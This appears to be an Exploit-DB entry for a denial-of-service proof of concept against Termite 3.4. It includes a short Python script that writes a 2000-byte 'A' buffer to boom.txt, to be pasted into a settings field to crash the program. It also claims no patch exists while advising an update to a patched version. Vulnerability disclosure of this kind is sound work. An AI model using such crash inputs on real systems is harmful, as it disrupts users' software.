header-logo
Suggest Exploit
vendor:
Termite
by:
Abdullah Aliç
5.5
CVSS
MEDIUM
Denial of Service
CWE
Product Name: Termite
Affected Version From: 3.4
Affected Version To: 3.4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional sp3 (ENG)
2018

Termite 3.4 – Denial of Service (PoC)

This exploit creates a file with a large payload, causing a denial of service in Termite 3.4. By running a python script, a new file called "boom.txt" is created with a payload of 2000 bytes. When this content is copied and pasted into the "User interface language" field in Termite 3.4, it triggers a denial of service.

Mitigation:

To mitigate this vulnerability, it is recommended to update Termite to a newer version that has patched this issue.
Source

Exploit-DB raw data:

# Exploit Title: Termite 3.4 - Denial of Service (PoC)
# Author: Abdullah Alıç
# Discovey Date: 2018-09-23
# Vendor notified : 2018-09-24
# Homepage: https://www.compuphase.com
# Software Link: https://www.compuphase.com/software_termite.htm
# Tested Version: 3.4
# Tested on OS: Windows XP Professional sp3 (ENG)
# Steps to Reproduce: Run the python exploit script, it will create a new file
# file with the name "boom.txt". Copy the content of the new file "boom.txt". 
# Start termite 3.4 terminal click "Settings" Paste the content into field "User interface langauge" click "OK" 
  
#!/usr/bin/python
   
buffer = "A" * 2000

payload = buffer
try:
    f=open("boom.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"